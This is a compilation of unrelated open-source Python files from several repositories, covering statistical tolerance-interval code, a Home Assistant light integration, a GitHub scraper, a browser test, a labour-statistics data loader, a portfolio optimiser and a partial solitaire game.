3.3641, 2.8501, 2.6716, 2.5784, 2.5207,
2.4814, 2.4529, 2.4314, 2.4147, 2.4013,
# n = 40
2.6836, 2.4425, 2.3498, 2.2987, 2.2658,
2.2427, 2.2254, 2.2120, 2.2013, 2.1926,
# n = 150
2.2712, 2.1740, 2.1336, 2.1103, 2.0948,
2.0835, 2.0749, 2.0681, 2.0625, 2.0578,
# n = 500
2.1175, 2.0697, 2.0492, 2.0372, 2.0291,
2.0231, 2.0185, 2.0149, 2.0118, 2.0093,
# n = infinity
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF9(BaseTestIso.TestIsoTableF):
coverage = 0.99
confidence = 0.99
# This is n from the table.
sample_size = np.array([
3, 7, 15, 28, 70, 200, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 3
28.5857, 10.6204, 7.6599, 6.4888, 5.8628,
5.4728, 5.2065, 5.0131, 4.8663, 4.7512,
# n = 7
7.1908, 5.0656, 4.4559, 4.1605, 3.9847,
3.8678, 3.7844, 3.7220, 3.6736, 3.6350,
# n = 15
4.6212, 3.8478, 3.5825, 3.4441, 3.3581,
3.2992, 3.2564, 3.2238, 3.1983, 3.1777,
# n = 28
3.8042, 3.3792, 3.2209, 3.1350, 3.0801,
3.0418, 3.0135, 2.9916, 2.9742, 2.9600,
# n = 70
3.2284, 3.0179, 2.9334, 2.8857, 2.8544,
2.8319, 2.8150, 2.8016, 2.7908, 2.7818,
# n = 200
2.9215, 2.8144, 2.7695, 2.7434, 2.7260,
2.7133, 2.7036, 2.6958, 2.6894, 2.6841,
# n = 1000
2.7184, 2.6756, 2.6570, 2.6461, 2.6387,
2.6332, 2.6290, 2.6257, 2.6229, 2.6205,
# n = infinity
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
```
#### File: toleranceinterval/twoside/_normal_approx.py
```python
r"""
Algorithms for computing approximate two-sided statistical tolerance interval
factors under the assumption of a normal distribution.
"""
import numpy as np
from scipy.stats import norm, chi2
def tolerance_factor_howe(n, p, g, m=None, nu=None):
r"""
Compute two-side central tolerance interval factor using Howe's method.
Computes the two-sided tolerance interval (TI) factor under a normal
distribution assumption using Howe's method. This follows the derivation
in [1]. This is an approximation, and does not represent the exact TI.
Parameters
----------
n : scalar
Sample size.
p : float
Percentile for central TI to estimate.
g : float
Confidence level where g > 0. and g < 1.
m : scalar
Number of independent random samples (of size n). If None,
default value is m = 1.
nu : scalar
Degrees of freedom for distribution of the (pooled) sample
variance. If None, default value is nu = m*(n-1).
Returns
-------
float
The calculated tolerance factor for the tolerance interval.
References
----------
[1] <NAME>. (1969). "Two-sided Tolerance Limits for Normal
Populations - Some Improvements", Journal of the American Statistical
Association, 64 , pages 610-620.
"""
# Handle defaults for keyword inputs.
if m is None:
m = 1
if nu is None:
nu = m * (n - 1)
alpha = 1.0 - g
zp = norm.ppf((1.0 + p) / 2.0)
u = zp * np.sqrt(1.0 + (1.0 / n))
chi2_nu = chi2.ppf(alpha, df=nu)
v = np.sqrt(nu / chi2_nu)
k = u * v
return k
def tolerance_factor_guenther(n, p, g, m=None, nu=None):
r"""
Compute two-side central tolerance interval factor using Guenther's method.
Computes the two-sided tolerance interval (TI) factor under a normal
distribution assumption using Guenthers's method. This follows the
derivation in [1]. This is an approximation, and does not represent the
exact TI.
Parameters
----------
n : scalar
Sample size.
p : float
Percentile for central TI to estimate.
g : float
Confidence level where g > 0. and g < 1.
m : scalar
Number of independent random samples (of size n). If None,
default value is m = 1.
nu : scalar
Degrees of freedom for distribution of the (pooled) sample
variance. If None, default value is nu = m*(n-1).
Returns
-------
float
The calculated tolerance factor for the tolerance interval.
References
----------
[1] <NAME>. (1977). "Sampling Inspection in Statistical Quality
Control", Griffin's Statistical Monographs, Number 37, London.
"""
# Handle defaults for keyword inputs.
if m is None:
m = 1
if nu is None:
nu = m * (n - 1)
k = tolerance_factor_howe(n, p, g, m, nu)
alpha = 1.0 - g
chi2_nu = chi2.ppf(alpha, df=nu)
w = np.sqrt(1.0 + ((n - 3.0 - chi2_nu) / (2.0 * (n + 1.0) ** 2)))
k *= w
return k
```
#### File: toleranceinterval/twoside/twoside.py
```python
import numpy as np
from ..checks import numpy_array, assert_2d_sort
from . import _normal_exact as exact
from . import _normal_approx as approx
def normal_factor(n, p, g, method=None, m=None, nu=None, d2=None,
simultaneous=False, tailprob=False):
r"""
Compute two-sided central tolerance factor using the normal distribution.
Computes the tolerance factor k for the two-sided central tolerance
interval (TI) to cover a proportion p of the population with confidence g:
TI = [Xmean - k * S, Xmean + k * S]
where Xmean = mean(X), S = std(X), X = [X_1,...,X_n] is a random sample
of size n from the distribution N(mu,sig2) with unknown mean mu and
variance sig2.
The tolerance factor k is determined such that the tolerance intervals
with confidence g cover at least the coverage fraction
of the distribution N(mu,sigma^2), i.e.
Prob[ Prob( Xmean - k * S < X < Xmean + k * S ) >= p ] = g,
for X ~ N(mu,sig2) which is independent of Xmean and S.
By default, this function uses an 'exact' method for computing the factor
by Gauss-Kronod quadrature as described in the references [1,2,4]. There
are also two approximate methods implemented: the 'howe' method as
described in [5], and the 'guenther' method as described in [6]. A brief
overview of both approximate methods can be found at NIST's website:
https://www.itl.nist.gov/div898/handbook/prc/section2/prc263.htm
Additional optional parameters are available to consider pooled variance
studies when m random samples of size n are available. Furthermore,
for the 'exact' method, optional parameters are available to
consider simultaneous tolerance intervals as described in [7,8].
If S is a pooled estimator of sig, based on m random samples of size n,
normal_factor computes the tolerance factor k for the two-sided p-content
and g-confidence tolerance intervals
TI = [Xmean_i - k * S, Xmean_i + k * S], for i = 1,...,m
where Xmean_i = mean(X_i), X_i = [X_i1,...,X_in] is a random sample of
size n from the distribution N(mu_i,sig2) with unknown mean mu_i and
variance sig2, and S = sqrt(S2), S2 is the pooled estimator of sig2,
S2 = (1/nu) * sum_i=1:m ( sum_j=1:n (X_ij - Xmean_i)^2 )
with nu degrees of freedom, nu = m * (n-1). For the 'exact' method, both
the simultaneous and non-simultaneous cases can be considered.
Parameters
----------
n : scalar
Sample size
p : scalar in the interval [0.0, 1.0]
Coverage (or content) probability,
Prob( Xmean - k * S < X < Xmean + k * S ) >= p
g : scalar in the interval [0.0, 1.0]
Confidence probability,
Prob[ Prob( Xmean-k*S < X < Xmean+k*S ) >= p ] = g.
method : str
Method to use for computing the factor. Available methods are 'exact',
'howe', and 'guenther'. If None, the default method is 'exact'.
m : scalar
Number of independent random samples (of size n). If None,
default value is m = 1.
nu : scalar
Degrees of freedom for distribution of the (pooled) sample
variance S2. If None, default value is nu = m*(n-1).
d2 : scalar
Normalizing constant. For computing the factors of the
non-simultaneous tolerance limits (xx'*betaHat +/- k * S)
for the linear regression y = XX*beta +epsilon, set d2 =
xx'*inv(XX'*XX)*xx.
Typically, in simple linear regression the estimator S2 has
nu = n-2 degrees of freedom. If None, default value is d2 = 1/n.
simultaneous : boolean
Logical flag for calculating the factor for
simultaneous tolerance intervals. If False, normal_factor will
calculate the factor for the non-simultaneous tolerance interval.
Default value is False.
tailprob : boolean
Logical flag for representing the input probabilities
'p' and 'g'. If True, the input parameters are
represented as the tail coverage (i.e. 1 - p) and tail confidence
(i.e. 1 - g). This option is useful if the interest is to
calculate the tolerance factor for extremely large values
of coverage and/or confidence, close to 1, as
e.g. coverage = 1 - 1e-18. Default value is False.
Returns
-------
float
The calculated tolerance factor for the tolerance interval.
References
----------
[1] <NAME>, <NAME>. (2009). Statistical Tolerance Regions:
Theory, Applications, and Computation. John Wiley & Sons, Inc.,
Hoboken, New Jersey. ISBN: 978-0-470-38026-0, 512 pages.
[2] <NAME>. On the exact two-sided tolerance intervals for
univariate normal distribution and linear regression. Austrian
Journal of Statistics 43(4), 2014, 279-92.
http://ajs.data-analysis.at/index.php/ajs/article/viewFile/vol43-4-6/35
[3] ISO 16269-6:2014: Statistical interpretation of data - Part 6:
Determination of statistical tolerance intervals.
[4] <NAME>., <NAME>.: Two-sided tolerance limits of normal
distributions with unknown means and unknown common variability.
MEASUREMENT SCIENCE REVIEW, Volume 3, Section 1, 2003, 75-78.
[5] <NAME>. “Two-Sided Tolerance Limits for Normal Populations,
Some Improvements.” Journal of the American Statistical Association,
vol. 64, no. 326, [American Statistical Association, Taylor & Francis,
Ltd.], 1969, pp. 610–20, https://doi.org/10.2307/2283644.
[6] <NAME>. (1977). "Sampling Inspection in Statistical Quality
Control",, Griffin's Statistical Monographs, Number 37, London.
[7] <NAME> (1990) Simultaneous Tolerance Intervals for Normal
Populations With Common Variance, Technometrics, 32:1, 83-92,
DOI: 10.1080/00401706.1990.10484595
[8] <NAME> & <NAME> (2022). Construction of
simultaneous tolerance intervals for several normal distributions,
Journal of Statistical Computation and Simulation, 92:1, 101-114,
DOI: 10.1080/00949655.2021.1932885
"""
# Handle default method:
if method is None:
method = 'exact'
if method == 'exact':
k = exact.tolerance_factor(n, p, g, m, nu, d2, simultaneous, tailprob)
elif method == 'howe':
k = approx.tolerance_factor_howe(n, p, g, m, nu)
elif method == 'guenther':
k = approx.tolerance_factor_guenther(n, p, g, m, nu)
else:
raise ValueError(
"Invalid method requested. Valid methods are 'exact', 'howe', or "
"'guenther'."
)
return k
def normal(x, p, g, method=None, pool_variance=False):
r"""
Compute two-sided central tolerance interval using the normal distribution.
Computes the two-sided tolerance interval (TI) to cover a proportion p of
the population with confidence g using the normal distribution. This
follows the standard approach to calculate the interval as a factor of
sample standard deviations away from the sample mean.
TI = [Xmean - k * S, Xmean + k * S]
where Xmean = mean(X), S = std(X), X = [X_1,...,X_n] is a random sample
of size n from the distribution N(mu,sig2) with unknown mean mu and
variance sig2.
By default, this function uses an 'exact' method for computing the TI
by Gauss-Kronod quadrature. There are also two approximate methods
implemented: the 'howe' method, and the 'guenther' method. See the
documentation for normal_factor for more details on the methods.
Parameters
----------
x : ndarray (1-D, or 2-D)
Numpy array of samples to compute the tolerance interval. Assumed data
type is np.float. Shape of (m, n) is assumed for 2-D arrays with m
number of sets of sample size n.
p : float
Percentile for central TI to cover.
g : float
Confidence level where g > 0. and g < 1.
method : str
Method to use for computing the TI. Available methods are 'exact',
'howe', and 'guenther'. If None, the default method is 'exact'.
pool_variance : boolean
Consider the m random samples to share the same variance such that
the degrees of freedom are nu = m*(n-1). Default is False.
Returns
-------
ndarray (2-D)
The normal distribution toleranace interval bound. Shape (m, 2) from m
sets of samples, where [:, 0] is the lower bound and [:, 1] is the
upper bound.
References
----------
See the documentation for normal_factor for a complete list of references.
Examples
--------
Estimate the 90th percentile central TI with 95% confidence of the
following 100 random samples from a normal distribution.
>>> import numpy as np
>>> import toleranceinterval as ti
>>> x = np.random.nomral(100)
>>> bound = ti.twoside.normal(x, 0.9, 0.95)
>>> print('Lower bound:', bound[:, 0])
>>> print('Upper bound:', bound[:, 1])
Estimate the 95th percentile central TI with 95% confidence of the
following 100 random samples from a normal distribution.
>>> bound = ti.twoside.normal(x, 0.95, 0.95)
"""
x = numpy_array(x) # check if numpy array, if not make numpy array
x = assert_2d_sort(x)
m, n = x.shape
# Handle pooled variance case
if pool_variance:
_m = m
else:
_m = 1
k = normal_factor(n, p, g, method, _m)
bound = np.zeros((m, 2))
xmu = x.mean(axis=1)
kstd = k * x.std(axis=1, ddof=1)
bound[:, 0] = xmu - kstd
bound[:, 1] = xmu + kstd
return bound
def lognormal(x, p, g, method=None, pool_variance=False):
r"""
Two-sided central tolerance interval using the lognormal distribution.
Computes the two-sided tolerance interval using the lognormal distribution.
This just performs a ln and exp transformations of the normal distribution.
Parameters
----------
x : ndarray (1-D, or 2-D)
Numpy array of samples to compute the tolerance interval. Assumed data
type is np.float. Shape of (m, n) is assumed for 2-D arrays with m
number of sets of sample size n.
p : float
Percentile for central TI to estimate.
g : float
Confidence level where g > 0. and g < 1.
method : str
Method to use for computing the TI. Available methods are 'exact',
'howe', and 'guenther'. If None, the default method is 'exact'.
pool_variance : boolean
Consider the m random samples to share the same variance such that
the degrees of freedom are nu = m*(n-1). Default is False.
Returns
-------
ndarray (2-D)
The lognormal distribution toleranace interval bound. Shape (m, 2)
from m sets of samples, where [:, 0] is the lower bound and [:, 1] is
the upper bound.
Examples
--------
Estimate the 90th percentile central TI with 95% confidence of the
following 100 random samples from a lognormal distribution.
>>> import numpy as np
>>> import toleranceinterval as ti
>>> x = np.random.random(100)
>>> bound = ti.twoside.lognormal(x, 0.9, 0.95)
>>> print('Lower bound:', bound[:, 0])
>>> print('Upper bound:', bound[:, 1])
Estimate the 95th percentile central TI with 95% confidence of the
following 100 random samples from a normal distribution.
>>> bound = ti.twoside.lognormal(x, 0.95, 0.95)
"""
x = numpy_array(x) # check if numpy array, if not make numpy array
x = assert_2d_sort(x)
return np.exp(normal(np.log(x), p, g, method, pool_variance))
```
|
{
"source": "jedmeng/homeassistant-opple",
"score": 2
}
|
#### File: custom_components/light/opple.py
```python
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
from homeassistant.components.light import SUPPORT_BRIGHTNESS, SUPPORT_COLOR_TEMP, ATTR_COLOR_TEMP, ATTR_BRIGHTNESS, \
Light, PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_HOST
REQUIREMENTS = ['pyoppleio']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'opple light'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string
})
def setup_platform(hass, config, add_devices, discovery_info=None):
name = config.get('name')
host = config.get('host')
add_devices([OppleLight(name, host)])
class OppleLight(Light):
def __init__(self, name, host):
from pyoppleio.OppleLightDevice import OppleLightDevice
self._device = OppleLightDevice(host)
self._name = name
self._is_on = None
self._brightness = None
self._color_temp = None
_LOGGER.info('Init light %s %s', self._device.ip, self._device.mac)
@property
def available(self):
return self._device.is_online
@property
def name(self):
return self._name
@property
def is_on(self):
return self._is_on
@property
def brightness(self):
return self._brightness
@property
def color_temp(self):
return color_util.color_temperature_kelvin_to_mired(self._color_temp)
@property
def min_mireds(self):
return 175
@property
def max_mireds(self):
return 333
@property
def supported_features(self):
return SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP
def turn_on(self, **kwargs):
_LOGGER.debug('Turn on light %s %s', self._device.ip, kwargs)
if not self.is_on:
self._is_on = self._device.power_on = True
if ATTR_BRIGHTNESS in kwargs and self.brightness != kwargs[ATTR_BRIGHTNESS]:
self._brightness = self._device.brightness = kwargs[ATTR_BRIGHTNESS]
if ATTR_COLOR_TEMP in kwargs and self.brightness != kwargs[ATTR_COLOR_TEMP]:
self._color_temp = self._device.color_temperature = \
color_util.color_temperature_mired_to_kelvin(kwargs[ATTR_COLOR_TEMP])
def turn_off(self, **kwargs):
self._device.power_on = False
_LOGGER.debug('Turn off light %s', self._device.ip)
def update(self):
self._device.update()
self._is_on = self._device.power_on
self._brightness = self._device.brightness
self._color_temp = self._device.color_temperature
if not self.available:
_LOGGER.info('Light %s is offline', self._device.ip)
elif not self.is_on:
_LOGGER.debug('Update light %s success: power off', self._device.ip)
else:
_LOGGER.debug('Update light %s success: power on brightness %s color temperature %s',
self._device.ip, self._brightness, self._color_temp)
```
|
{
"source": "jedpatrickdatu/github-scraper",
"score": 3
}
|
#### File: github-scraper/githubScraper/GitHub.py
```python
from requests import get
class GitHub:
supportedResources = [
'projects',
'pulls',
'branches',
'collaborators',
'comments',
'forks',
'issues',
'commits',
]
def __init__(self, owner, repos, resources):
self.owner = owner
self.repos = repos
for resource in resources:
if resource not in self.supportedResources:
print (self.supportedResources)
raise Exception('The value "'+resource+'" passed to the parameter for GitHub resources is unsupported. Please see the documentation for a list of supported values.')
self.resources = resources
self.numRepos = len(repos)
self.numResources = len(resources)
self.currentRepoIndex = 0
self.currentResourceIndex = 0
self.resourcePageIndex = 1
def read(self):
if self.currentRepoIndex >= self.numRepos:
return None
requestUrl = 'https://api.github.com/repos/'+self.owner+'/'+self.repos[self.currentRepoIndex]+'/'+self.resources[self.currentResourceIndex]+'?page='+str(self.resourcePageIndex)
ghData = get(requestUrl).json()
if ghData:
self.resourcePageIndex += 1
else:
self.resourcePageIndex = 1
self.currentResourceIndex += 1
if self.currentResourceIndex >= self.numResources:
self.currentRepoIndex += 1
self.currentResourceIndex = 0
return ghData
```
|
{
"source": "jedp/gaia",
"score": 2
}
|
#### File: functional/browser/test_browser_navigation.py
```python
from marionette.by import By
from gaiatest import GaiaTestCase
from gaiatest.apps.browser.app import Browser
class TestBrowserNavigation(GaiaTestCase):
_community_link_locator = (By.CSS_SELECTOR, '#community a')
_community_history_section_locator = (By.ID, 'history')
def setUp(self):
GaiaTestCase.setUp(self)
self.connect_to_network()
def test_browser_back_button(self):
browser = Browser(self.marionette)
browser.launch()
browser.go_to_url('http://mozqa.com/data/firefox/layout/mozilla.html')
browser.switch_to_content()
self.verify_home_page()
community_link = self.marionette.find_element(*self._community_link_locator)
# TODO: remove the explicit scroll once bug 833370 is fixed
self.marionette.execute_script("arguments[0].scrollIntoView(false);", [community_link])
community_link.tap()
self.verify_community_page()
browser.switch_to_chrome()
browser.tap_back_button()
browser.switch_to_content()
self.verify_home_page()
browser.switch_to_chrome()
browser.tap_forward_button()
browser.switch_to_content()
self.verify_community_page()
def verify_home_page(self):
self.wait_for_element_present(*self._community_link_locator)
community_link = self.marionette.find_element(*self._community_link_locator)
self.assertTrue(community_link.is_displayed(), 'The community link was not visible at mozilla.html.')
def verify_community_page(self):
self.wait_for_element_present(*self._community_history_section_locator)
history_section = self.marionette.find_element(*self._community_history_section_locator)
self.assertTrue(history_section.is_displayed(), 'The history section was not visible at mozilla_community.html.')
```
|
{
"source": "jedpittman/jobhopper",
"score": 3
}
|
#### File: data/bls/oes_data_downloader.py
```python
from lxml import html
import requests
import pandas as pd
from urllib.request import urlopen
from tempfile import NamedTemporaryFile
import shutil
from shutil import unpack_archive
import os
import logging
log = logging.getLogger()
# TODO: *, #, and ** are not returned as NA
class OESDataDownloader(object):
"""
Download BLS data on Occupational Employment Statistics (OES). Data for various years provided
at https://www.bls.gov/oes/tables.htm
Data format: Zip folder, with a single Excel file containing OES data, at least for 2018 and 2019
"""
def __init__(self, year="2019", tempfile_dir="/tmp/bls_oesm"):
"""
:param year: String indicating the year for the download. Zip names are in
oesm<last 2 digits of year>all.zip format.
:param tempfile_dir: Specify a (temp)file directory
"""
self.base_url = "https://www.bls.gov/"
self.oes_data_url = "https://www.bls.gov/oes/tables.htm"
self.oes_zipname = "oesm{}all".format(year[2:4])
self.tempfile_dir = tempfile_dir
self.year = year
self.oes_download_path = self._get_oes_download_path()
def _get_oes_download_path(self) -> str:
"""
Parse the OES tables page from the BLS site to find the download link for the specified year
"""
log.info("Finding OES data download path from {}".format(self.oes_data_url))
page_data = requests.get(self.oes_data_url)
tree = html.fromstring(page_data.content)
oes_file_href = tree.xpath(
'.//a[contains(@href, "{}")]/@href'.format(
"{}.zip".format(self.oes_zipname)
)
)[0]
oes_download_path = "{}{}".format(self.base_url, oes_file_href)
log.info("Download path: {}".format(oes_download_path))
return oes_download_path
def download_oes_data(self, clean_up=False) -> pd.DataFrame:
"""
Download the zip folder into the tempfile_dir, and load the Excel file
Estimated number of rows: 350K+
"""
log.info("Downloading OES data from {}".format(self.oes_download_path))
# Download the zip folder
with urlopen(self.oes_download_path) as response, NamedTemporaryFile() as tfile:
log.info(f"Files stored temporarily here: {self.tempfile_dir}")
tfile.write(response.read())
tfile.seek(0)
log.info(f"about to unpack file: {tfile.name}")
# Unzip folder + files
unpack_archive(tfile.name, self.tempfile_dir, format="zip")
# BLS OES data filename format
expected_filename = "all_data_M_{}.xlsx".format(self.year)
# Download file
for root, subdirs, files in os.walk(self.tempfile_dir):
log.info("Files found: {}".format(files))
for file in files:
if expected_filename in file:
filepath = "{}/{}".format(root, file)
log.info(
"Reading Excel file: {} --- This may take a few minutes.".format(
filepath
)
)
return pd.read_excel(filepath)
# Remove directory
if clean_up:
shutil.rmtree(self.tempfile_dir)
```
#### File: data/scripts/sql_loader_jed.py
```python
import logging
import os
import pandas as pd
from sqlalchemy.types import Integer, Numeric, String
from sqlalchemy import create_engine
from data.bls.oes_data_downloader import OESDataDownloader
from data.bls.utils.dtype_conversion import to_float, to_int
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
JOBHOPPER_DB = "jobhopperdatabase" if not os.getenv("DB_NAME") else os.getenv("DB_NAME")
USERNAME = "jobuser" if not os.getenv("DB_USER") else os.getenv("DB_USER")
PASSWORD = "<PASSWORD>" if not os.getenv("DB_PASSWORD") else os.getenv("DB_PASSWORD")
PORT = "5432" if not os.getenv("DB_PORT") else os.getenv("DB_PORT")
HOST = "localhost" if not os.getenv("DB_HOST") else os.getenv("DB_HOST")
def create_sqlalchemyengine(
username: str = "", password: str = "", port: str = "5432", host: str = "localhost"
):
"""
Create a database connection to a SQLite database based on the specified params
Note: Postgres must be installed with the project database to run this locally
:param username: Database user, if available
:param password: <PASSWORD> the <PASSWORD>, if available
:param port: Default for Postgres is 5432
:param host: localhost by default
"""
try:
log.info("Connecting to Postgres DB via SQLAlchemy")
engine = create_engine(
"postgresql://{}:{}@{}:{}/{}".format(
username, password, host, port, JOBHOPPER_DB
)
)
return engine
except Exception as e:
log.error(e)
def load_bls_oes_to_sql(file_to_load=""):
"""
Load BLS OES data from 2019 to Postgres.
# TODO: Check OES data from prior years for formatting
# TODO: Clean/combine SOC codes from datasets to include latest data on SOC codes from transitions data
"""
log.info("Loading BLS wage and employment data to Postgres")
engine = create_sqlalchemyengine(
username=USERNAME, password=PASSWORD, port=PORT, host=HOST
)
if file_to_load == "":
bls_oes_data = OESDataDownloader().download_oes_data("2019")
else:
bls_oes_data = pd.read_excel(file_to_load)
# TODO: Abstract into data cleaning step once we finalize format
# O*Net SOC codes generally append .00 to the original SOC codes
bls_oes_data = (
bls_oes_data[
["area_title", "occ_code", "occ_title", "h_mean", "a_mean", "tot_emp"]
]
.assign(
soc_decimal_code=bls_oes_data["occ_code"].apply(
lambda x: "{}.00".format(x)
),
h_mean=bls_oes_data["h_mean"].apply(lambda x: to_float(x)),
a_mean=bls_oes_data["a_mean"].apply(lambda x: to_float(x)),
tot_emp=bls_oes_data["tot_emp"].apply(lambda x: to_int(x)),
)
.rename(
{
"occ_code": "soc_code",
"occ_title": "soc_title",
"h_mean": "hourly_mean_wage",
"a_mean": "annual_mean_wage",
"tot_emp": "total_employment",
},
axis=1,
)
)
bls_oes_data.to_sql(
"bls_oes",
engine,
if_exists="replace",
index=False,
dtype={
"soc_decimal_code": String(),
"hourly_mean_wage": Numeric(),
"annual_mean_wage": Numeric(),
"total_employment": Integer(),
"soc_code": String(),
"soc_title": String(),
},
)
log.info("Successfully loaded BLS data to Postgres!")
return bls_oes_data
def load_occupation_transitions_to_sql(
file_path="../occupation_transitions_public_data_set.csv",
):
"""
Load the occupation transitions data to SQL from the CSV file in jobhopper.data
"""
log.info("Loading occupation transitions (Burning Glass) data to Postgres")
engine = create_sqlalchemyengine(
username=USERNAME, password=PASSWORD, port=PORT, host=HOST
)
occupation_transitions = pd.read_csv(
file_path,
na_values=["NA"],
usecols=["soc1", "soc2", "total_soc", "pi", "occleaveshare"],
dtype={
"soc1": str,
"soc2": str,
"total_soc": int,
"pi": float,
"occleaveshare": float,
},
)
occupation_transitions.to_sql(
"occupation_transition",
engine,
if_exists="replace",
index=False,
dtype={
"soc1": String(),
"soc2": String(),
"total_soc": Integer(),
"pi": Numeric(),
"occleaveshare": Numeric(),
},
)
return occupation_transitions
if __name__ == "__main__":
"""
Expected results in postgres table:
jobhopperdatabase=# SELECT * FROM bls_oes_data LIMIT 5;
area_title | soc_code | soc_title | hourly_mean_wage | annual_mean_wage | total_employment | soc_decimal_code
------------+----------+------------------------------------------------+------------------+------------------+------------------+------------------
U.S. | 11-0000 | Management Occupations | 58.88 | 122480.0 | 8054120 | 11-0000.00
U.S. | 13-0000 | Business and Financial Operations Occupations | 37.56 | 78130.0 | 8183750 | 13-0000.00
U.S. | 15-0000 | Computer and Mathematical Occupations | 45.08 | 93760.0 | 4552880 | 15-0000.00
U.S. | 17-0000 | Architecture and Engineering Occupations | 42.69 | 88800.0 | 2592680 | 17-0000.00
U.S. | 19-0000 | Life, Physical, and Social Science Occupations | 37.28 | 77540.0 | 1288920 | 19-0000.00
jobhopperdatabase=# SELECT * FROM occupation_transition LIMIT 5;
soc1 | soc2 | total_soc | pi | occleaveshare
---------+---------+-----------+-------------------------+---------------
11-1011 | 17-1022 | 1425400 | 0.0006041965 | 0.14635982
11-1011 | 25-1065 | 1425400 | 0.000023418379999999998 | 0.14635982
11-1011 | 33-9032 | 1425400 | 0.0028994256 | 0.14635982
11-1011 | 53-7073 | 1425400 | 0.000013282203 | 0.14635982
11-1011 | 19-4031 | 1425400 | 0.00004537824000000001 | 0.14635982
"""
# load_bls_oes_to_sql(
# "C:/Users/jedpi/OneDrive/Documents/GitHub/jobhopper/oesm19all/all_data_M_2019.xlsx"
# )
load_occupation_transitions_to_sql(
"C:/Users/jedpi/OneDrive/Documents/GitHub/jobhopper/data/occupation_transitions_public_data_set.csv"
)
```
|
{
"source": "jedpittman/python_samples",
"score": 3
}
|
#### File: python_samples/StockPortfolio/runportfolio.py
```python
import pandas as pd
import numpy as np
import requests
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
#load the data
# from google.colab import files
# files.upload()
# Store the data
df = pd.read_csv("data\FakeStockData.csv")
# df = pd.read_csv('NUSE_Close.csv')
#df # show the data frame.
# Should be this form:
# Date | Symbol1 | symbol2 ... etc.
# for each symbol, should be a close price.
# Set the date as the index
df.set_index(pd.DatetimeIndex(df['Date'].values))
# Remove the date column from the df
# columns = axis 1
df.drop(columns=['Date'], axis=1, inplace=True)
#print(df)
#df
#exit(1)
# Calculate the expected annualized returns and the annualized
# sample covariance matrix of the daily asset returns.
mu = expected_returns.mean_historical_return(df)
S = risk_models.sample_cov(df)
# SR describes the excess return you get for volitility you endure holding
# a riskier asset.
ef = EfficientFrontier(mu, S) # create the EF object
weights = ef.max_sharpe() # Get the raw weights
# this will set weights below cutoff to zero, rounding the rest.
cleaned_weights = ef.clean_weights()
print(cleaned_weights)
#show the expected return, SR, and
# in a jupyter notebook, this shows an ordered dicts.
# should sum to 1 for all weights.
ef.portfolio_performance(verbose=True)
#Figure out the allocations for each stock.
# pip install pulp
#Get the discrete allocation of each share per stock
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
portfolio_val = 5000 # how much to invest
latest_prices = get_latest_prices(df)
weights = cleaned_weights
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_val)
allocation, leftover = da.lp_portfolio()
# Returns a dictionary with pairs ticker: #shares
# Returns 1 leftover.
print('Discrete allocation:', allocation)
print("leftovers: ",leftover)
exit(1)
"""
# Get company name for stock ticker
def get_company_name(symbol):
url = 'http://d.yimg.com/autoc.finance.yahoo.com/autoc?query=' + symbol + '®ion=1lang=en'
result = requests.get(url).json()
for r in result['ResultSet']['Result']:
if r['symbol'] == symbol:
return r['name']
# Store the company name into a list.
company_name = []
for symbol in allocation:
company_name.append( get_company_name(symbol))
# Get the discrete allocation values
discrete_allocation_list = []
for symbol in allocation:
discrete_allocation_list.append(allocation.get(symbol)
# Create a dataframe for the portfolio
portfolio_df = pd.DataFrame(columns=['Company_name', 'Company_ticker', 'Discrete_val_' + str(portfolio_val)])
portfolio_df['Company_name'] = company_name
portfolio_df['Company_ticker'] = allocation
portfolio_df['Discrete_val' + str(portfolio_val)] = discrete_allocation_list
# Show it.
portfolio_df
"""
```
|
{
"source": "jedrennen/pyklondike",
"score": 3
}
|
#### File: pyklondike/PyKlondike/game.py
```python
from sys import stdout
from playingCard import PlayingCard
from cardPile import CardPile
from tablePile import TablePile
from drawPile import DrawPile
from discardPile import DiscardPile
from suitPile import SuitPile
class Game(object):
suits = ['s', 'h', 'c', 'd']
ranks = ['A', '2', '3', '4', '5', '6', '7',
'8', '9', '0', 'J', 'Q', 'K']
cards = []
piles = []
def __init__(self, out=stdout, no_shuffle=False):
self.out = out
self._shuffle = not no_shuffle
#self.table_piles = [TablePile() for _ in range(7)]
self._seed_cards()
self._seed_piles()
def _seed_cards(self):
self.cards = []
for i, suit in enumerate(self.suits):
for j, rank in enumerate(self.ranks):
self.cards.append(PlayingCard(rank, suit))
def _seed_piles(self):
self.piles = []
self.piles = [DrawPile(), DiscardPile()]
for i in range(0,4):
self.piles.append(SuitPile())
for i in range(0, 7):
self.piles.append(TablePile())
def draw(self):
if self.piles[0].is_empty():
while not self.piles[1].is_empty():
card = self.piles[1].pop()
card.flip()
self.piles[0].add_card(card)
else:
card = self.piles[0].pop()
card.pile_number = 1
card.pile_index = len(self.piles[1])
self.piles[1].add_card(card)
if not card.is_face_up():
card.flip()
def quit(self):
self.piles = []
self.cards = []
def deal(self):
for pile in self.piles:
pile.clear()
self._seed_cards()
self._seed_piles()
z = 0
j = 0
for i in range(0, 28):
pile_index = 6 + j
card = self.cards[51 - i]
if j == z:
card.flip()
card.pile_number = pile_index
card.pile_index = len(self.piles[pile_index])
self.piles[pile_index].add_card(card)
j += 1
if pile_index == 12:
z += 1
j = z
for i in range(28, 52):
card = self.cards[51 - i]
card.pile_number = 0
card.pile_index = len(self.piles[0])
self.piles[0].add_card(card)
def move_card(self, card_from_str, card_to_str=''):
